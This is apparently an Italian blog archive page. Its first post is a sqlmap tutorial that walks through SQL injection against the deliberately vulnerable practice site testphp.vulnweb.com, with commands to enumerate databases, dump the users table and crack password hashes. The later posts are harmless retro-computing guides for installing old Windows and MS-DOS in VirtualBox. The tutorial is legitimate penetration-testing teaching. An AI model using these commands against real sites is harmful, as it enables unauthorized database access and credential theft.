Archive for settembre 2021

attacco a database con Sqlmap

Posted on 27 settembre 2021. Filed under: Senza categoria |

In questo articolo vedremo SqlMap.

Premetto che non è mia intenzione spiegare come attaccare sistemi altrui e ricordo che violare un sistema informatico non autorizzato è vietato dalla legge. Lo scopo dell’articolo è per spiegare come scoprire buchi nei vostri sistemi e quindi mettergli la “pezza”.

Sqlmap è un software open source per il penetration testing, che permette di automatizzare il rilevamento e lo sfruttamento di difetti nelle SQL injection e prendere così il controllo dei server DBMS. Il software lavora a linea di comando.
Sqlmap supporta svariati DBMS come MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, IBM DB2, SQLite, Firebird, Sybase, SAP MaxDB, HSQLDB e Informix. Supporta inoltre 6 diversi tipi di SQL injection.

Può riconoscere anche il formato hash delle password e lanciare su di esse degli attacchi a dizionario.

Sqlmap integra al suo interno altri strumenti per il Penetration Testing come Metasploit e w3af.

In questo articolo useremo Sqlmap su una macchina Kali Linux.

Come macchina della vittima useremo un sito di test appositamente creato per i test e per fare pratica di Penetration Testing.

Il sito è vulnweb.com.

Vediamo quindi come fare un Injection Sql a un database.

Apriamo una finestra terminale, e digitiamo il seguente comando:

sqlmap –u “http://testphp.vulnweb.com/listproducts.php?cat=1”. Dobbiamo mettere l’input in fase della query GET, ossia nella barra degli indirizzi.

Vedremo un output simile a questo:

Questo ci indica che il sito è vulnerabile.

Vediamo anche che il DBMS usato è MySql.

Abbiamo la conferma digitando:

sqlmap –u “http://testphp.vulnweb.com/listproducts.php?cat=1” –-dbms MySQL

Vediamo allora se siamo dba con il comando:

sqlmap –u “http://testphp.vulnweb.com/listproducts.php?cat=1” –is-dba

Non siamo dba ma andiamo avanti a scoprire su quale database ci connettiamo:

sqlmap –u “http://testphp.vulnweb.com/listproducts.php?cat=1” –current-db

Andiamo a vedere correnti username e password di connessione al database:

sqlmap –u “http://testphp.vulnweb.com/listproducts.php?cat=1” –current-user

sqlmap –u “http://testphp.vulnweb.com/listproducts.php?cat=1” –-passwords

Che però non ce la fa vedere perchè non siamo dba.

Procediamo comunque a vedere le tabelle e magari le righe.

sqlmap –u “http://testphp.vulnweb.com/listproducts.php?cat=1” –-tables

Per avere le righe di qualunque tabella basta usare

sqlmap –u “http://testphp.vulnweb.com/listproducts.php?cat=1” –-tables nometabella

ad esempio:

sqlmap –u “http://testphp.vulnweb.com/listproducts.php?cat=1” –-tables categ

Quella che ci interessa è però, ovviamente, la tabella users.

Usiamo quindi il comando:

sqlmap –u “http://testphp.vulnweb.com/listproducts.php?cat=1” –-dump users

Lui ci chiederà di craccare la password passandogli un file di dizionario o usando il suo dizionario:

Ma alla fine otteniamo quello che ci interessa:

A questo punto possiamo poi usare altri tools per modificare la password, cancellare l’utente, crearne uno nuovo e così via.

Ma quella è un’altra storia (e un altro articolo).

Quando Nuget si perde i pacchetti…

Posted on 22 settembre 2021. Filed under: Senza categoria |

Al rientro dalle vacanze ho acquistato e installato sul PC un nuovo disco fisso.

Installato Windows e i vari software, tra i quali Visual Studio 2019.

Ho provato poi ad aprire qualche software che ho sviluppato e funziona.

Non avevo provato le Mobile Application.

Passa circa un mese e voglio fare dei test con delle Application per i dispositivi portatili.

Creo quindi una Xamain.Forms Application e già subito dopo la creazione mi appaiono questi errori.

Cercando di capire cosa manca ho risolto e scrivo qua la procedura.

1) Andare in Strumenti, Opzioni, Gestione Pacchetti Nuget, Origini pacchetti e vi troverete una finestra come questa:

Notate che “Origini pacchetti” è vuota. Dobbiamo aggiungere Nuget.

2) Cliccare sul simbolo + verde e in automatico diventerà così:

3) Andare in basso e su nome digitare: ”nuget.org”

4) In Origine digitare: “https://api.nuget.org/v3/index.json”

5) Cliccare sul pulsante Aggiorna

La schermata diventerà così:

6) Cliccare su OK

7) Compilare il progetto: CTRL + SHIFT + B

Problema risolto, andiamo a vedere l’elenco degli errori:

Anche in Esplora Soluzioni non segnala più l’errore.

Rispolveriamo i vecchi giochi del DOS

Posted on 12 settembre 2021. Filed under: Senza categoria |

In questo articolo andremo a vedere come rispolverare i vecchi giochi a 16 bit e finire la serie per i nostalgici. Ci giocavo quando ero poco più che ventenne, era la scusa per far giocare i miei nipoti, ma ci giocavo e mi divertivo pure io.

Userò per questo la macchina virtuale Windows 3.1 in Virtualbox, installata con l’articolo https://pieer11.wordpress.com/2021/09/12/riesumiamo-windows-3-1/

Riapriamo quindi quella macchina virtuale.

Per procedere, dobbiamo trasformare i file contenuti nel dischetto in una immagine .ima o .img.

Per fare questo useremo Win Image. Vediamo prima quindi come funziona Win Image.

Win Image è un piccolo programma che serve proprio a creare file di immagine per floppy da usare nelle macchine virtuali.

Lo possiamo scaricare da www.winimage.com/download.htm

Una volta scaricato, lo eseguiamo e lo installiamo.

Apriamo quindi Win Image.

Clicchiamo sull’icona “Nuovo”

Clicchiamo poi su OK.

Clicchiamo ora su Inject e selezioniamo la cartella dove abbiamo copiato i file prelevati dal floppy fisico tramite un vecchio pc e trasferiti su un percorso di rete.

Prendo il gioco Tetris perché lo conosciamo un po’ tutti.

Quindi clicchiamo su Apri.

Ecco, ora siamo pronti a creare il file immagine.

Per fare questo clicchiamo su Sull’icona del dischetto.

Il formato deve essere ima.

Salviamo e ora siamo pronti a “mettere” il file nel lettore floppy virtuale di Virtualbox.

Facciamo OK.

A questo punto dobbiamo solo andare a trovare il dischetto e lanciare il file eseguibile.

Lo facciamo dal File Manager.

E così via per altri giochi o altro materiale che volete avere su un nuovo PC.

Riesumiamo windows 3.1

Posted on 12 settembre 2021. Filed under: Senza categoria |

In questo articolo vediamo come installare Windows 3 su una macchina virtuale.

I file per i download non sono miei, li ho trovati sulla rete, in allegato all’articolo installare windows 3.1 su virtual box | Gabriele97’s Blog (wordpress.com), ma potremo sempre crearli con WinImage.

Iniziamo.

Io ho creato un clone della macchina virtuale MS-DOS del quale trovate l’articolo qua: https://pieer11.wordpress.com/2021/09/11/installazione-di-ms-dos-6-22-in-virtualbox/

Scarichiamo il primo file Immagine da http://download1649.mediafire.com/inpryomz8izg/1uyymjj0zjt/a.ima

e lo andiamo a inserire nelle impostazioni della macchina virtuale in corrispondenza del Floppy in Virtualbox.

Avviamo la macchina virtuale e andiamo su A:

Digitiamo quindi SETUP

Premiamo il tasto INVIO e proseguiamo.

Creiamo una installazione personalizzata per vedere meglio le varie opzioni.

Lasciamo il nome della cartella così com’è, ormai ci siamo abituati.

Nella successiva schermata cambiamo in base alla foto sotto:

Proseguiamo.

Ci chiede il disco 2.

Inseriamo il disco 2, andando nelle impostazioni del Floppy e selezionando il file scaricato da http://www.mediafire.com/?gwuxujnomdw

Ci chiede adesso il disco 3

Facciamo la stessa cosa per il disco 3, scaricandolo da http://www.mediafire.com/?zw0jwzummez

Infine partirà la parte grafica dell’installazione:

Mettiamo il nome e procediamo.

Nella successiva schermata

togliamo la spunta su tutto.

Nella successiva schermata lasciamo le impostazioni predefinite:

Il disco 4 lo scarichiamo da http://www.mediafire.com/?kmotz33zntu

Il disco 5 lo scarichiamo da http://www.mediafire.com/?yno34zjzmmx

L’installazione è finita, lasciamo ora fare a Windows le ultime impostazioni per noi, automaticamente.

Usciamo dal tutorial.

Riavviamo il pc.

Per lanciare Windows basta semplicemente digitare WIN e poi Invio.

Possiamo ora rivivere quei bei momenti.

Come era il primo windows

Posted on 11 settembre 2021. Filed under: Senza categoria |

Nel mese di Luglio ho scritto un articolo sull’anteprima di Windows 11.

Ma com’era Windows 1.0, uscito nel 1985?

Eccolo dalla mia macchina virtuale in Virtualbox.

Proviamo a installarlo.

Prima di tutto dobbiamo scaricare la ISO. Io l’ho trovata in https://archive.org/details/win-1.0

Apriamo quindi Virtualbox, creiamo una macchina virtuale e seguite i passaggi come da miei screenshot.

Andiamo poi nelle impostazioni.

Possiamo ora avviare la macchina virtuale.

Continuerò in seguito a scrivere e pubblicare altri articoli su vecchi sistemi.

Installazione di MS-DOS 6.22 in Virtualbox

Posted on 11 settembre 2021. Filed under: Senza categoria |

Oggi ho voluto rispolverare vecchi sistemi operativi, per nostalgia di quando avevo 30 anni in meno.

Il problema principale è recuperare i file, in quanto nelle Subscription di My Visual Studio c’è solo il file compresso ma non in formato avviabile.

Se avete ancora i vecchi Floppy Disk funzionanti e un lettore floppy disk, o un PC vecchio, dovete trasformare ogni singolo floppy in una immagine. Per fare questo potete usare un programma chiamato Win Image, scaricabile da https://www.winimage.com/download.htm

Oppure possiamo scaricare i 3 file img dal seguente link:

https://www.dropbox.com/sh/jzm0fbnb7fz526u/mKJ19A1JMo (Il link l’ho trovato tramite ricerca sulla rete).

Una volta che abbiamo i file dei floppy in formato immagine, possiamo procedere.

Creiamo una nuova macchina virtuale e impostate i vari settaggi come nelle successive schermate.

Salviamo e avviamo la macchina virtuale,

L’installazione è finita.

Rimuoviamo i dischi virtuali e riabbiamo la macchina.

Ecco che possiamo usare il DOS.

Vedremo in un successivo articolo come installare Windows 3.1.